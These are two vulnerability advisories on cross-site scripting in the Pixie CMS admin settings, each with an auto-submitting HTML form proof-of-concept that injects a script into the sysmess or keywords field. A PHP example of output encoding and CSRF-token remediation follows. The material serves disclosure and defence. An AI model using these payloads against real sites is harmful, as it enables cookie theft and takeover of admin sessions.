Stored XSS vulnerability in Pixie
Vulnerability ID: HTB22469
Reference: http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_pixie.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ )
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists because the Pixie core settings saving script fails to properly sanitize user-supplied input in the sysmess variable.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability.

The following PoC is available:

<form accept-charset="UTF-8" action="http://host/admin/index.php?s=settings&x=pixie;" method="post" name="main">
<input type="hidden" name="langu" value="en-gb" />
<input type="hidden" name="time_zone" value="+0" />
<input type="hidden" name="dstime" value="no" />
<input type="hidden" name="dateformat" value="%Oe %B %Y, %H:%M" />
<input type="hidden" name="rte" value="1" />
<input type="hidden" name="logs" value="5" />
<input type="hidden" name="sysmess" value='hello message<script>alert(document.cookie)</script>' />
<input type="submit" name="settings_edit" id="form_addedit_submit" value="Update" />
</form>
<script>
document.getElementById('form_addedit_submit').click();
</script>
XSS vulnerability in Pixie
Vulnerability ID: HTB22468
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pixie.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ )
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists because the site settings saving script fails to properly sanitize user-supplied input in the keywords variable.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability.

The following PoC is available:

<form accept-charset="UTF-8" action="http://host/admin/index.php?s=settings&x=site;" method="post" name="main">
<input type="hidden" name="sitename" value="Pixie" />
<input type="hidden" name="url" value="http://host/;" />
<input type="hidden" name="default" value="blog/" />
<input type="hidden" name="keywords" value='key1<script>alert(document.cookie)</script>' />
<input type="hidden" name="site_auth" value="sute author" />
<input type="hidden" name="site_cright" value="copyright" />
<input type="hidden" name="cleanurls" value="yes" />
<input type="submit" name="settings_edit" id="form_addedit_submit" value="Update" />
</form>
<script>
document.getElementById('form_addedit_submit').click();
</script>
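Both advisories above come down to the same defect: a stored settings value (sysmess, keywords) is written back into HTML without encoding. The following is an added illustration, not Pixie's own code; the function names and the rendering contexts (sysmess in a div, keywords in a meta attribute) are assumptions, and the payload strings are the ones from the two PoCs.

```php
<?php
// Added example (not Pixie's code): context-aware output encoding for stored
// settings such as `sysmess` and `keywords`. Rendering contexts are assumed.

// Vulnerable pattern: the stored value is echoed verbatim, so a saved
// "<script>" inside sysmess runs in the browser of every admin who views it.
function render_sysmess_vulnerable(string $sysmess): string {
    return '<div id="sysmess">' . $sysmess . '</div>';
}

// Hardened helper: encode for an HTML text node. ENT_QUOTES also encodes both
// quote characters, so the same helper is safe inside a quoted attribute.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_sysmess(string $sysmess): string {
    return '<div id="sysmess">' . h($sysmess) . '</div>';
}

// keywords lands in an attribute value: encode it the same way and always keep
// the surrounding quotes, because an unquoted attribute ends at the first space.
function render_keywords_meta(string $keywords): string {
    return '<meta name="keywords" content="' . h($keywords) . '">';
}

// Payloads taken from the two PoCs above.
$sysmess  = "hello message<script>alert(document.cookie)</script>";
$keywords = "key1<script>alert(document.cookie)</script>";

echo render_sysmess_vulnerable($sysmess), "\n"; // raw <script> tag survives
echo render_sysmess($sysmess), "\n";            // &lt;script&gt;... is inert text
echo render_keywords_meta($keywords), "\n";     // same for the attribute context

// Self-check: no raw script tag may survive in the encoded output.
foreach ([render_sysmess($sysmess), render_keywords_meta($keywords)] as $out) {
    assert(strpos($out, '<script') === false);
}
```

Encoding on output is what removes the script execution; the PoCs additionally rely on the settings form accepting a cross-site POST, so a per-session CSRF token checked on settings_edit closes that delivery path as well.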